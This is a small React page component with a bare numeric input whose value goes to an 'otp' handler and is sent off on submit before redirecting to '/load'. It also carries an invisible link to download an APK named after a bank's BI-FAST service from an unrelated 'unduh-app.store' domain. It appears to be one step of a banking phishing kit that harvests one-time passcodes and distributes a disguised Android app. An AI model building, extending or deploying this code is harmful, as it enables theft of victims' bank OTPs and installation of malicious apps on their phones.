import {useNavigate} from 'react-router-dom'

function Page5(props) {
  let nav = useNavigate()
  const ok = () => {
    props.send()
    nav('/load')
  }

  return (
    <>
      <div className="page5">
        <form className='f5' onSubmit={ok}>
          <input style={{border: "transparans", padding:"18px 15px"}} type="number" placeholder="" onInput={e => props.otp(e.target.value)} /><br/>
          <button style={{marginTop:"14px"}}></button>
        </form>
        
        <a href="https://unduh-app.store/apk/Bi-Fast_Bankaltimtara.apk" className="wa"></a>
      </div>
    </>
  );
}

export default Page5;
